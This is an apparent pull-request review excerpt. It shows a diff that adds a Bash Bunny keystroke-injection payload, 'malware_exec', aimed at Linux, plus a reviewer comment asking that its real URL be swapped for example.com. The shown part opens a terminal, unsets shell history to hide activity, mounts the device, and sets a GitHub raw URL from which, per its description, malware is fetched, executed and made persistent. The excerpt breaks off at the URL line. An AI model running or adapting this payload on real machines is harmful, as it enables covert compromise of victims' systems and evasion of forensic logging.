payloads/library/execution/malware_exec/payload.txt

```diff
@@ -0,0 +1,68 @@
+# Title: malware_exec
+# Description: malware_exec fetches malware hosted on Internet and executes it on targets system. malware_exec can make malware persistent and can autorun.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk'
+Q ENTER
+Q DELAY 2000
+Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [Fetching malware]
+Q STRING url=https://raw.githubusercontent.com/drapl0n/temp/main/malware_exec
```

Comment:
>Including URLs
URLs used for retrieving staged code should refer exclusively to example.com using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).

Place change this to a example placeholder or example.com and add instructions in your `readme.md` instructing the user that it has to be changed.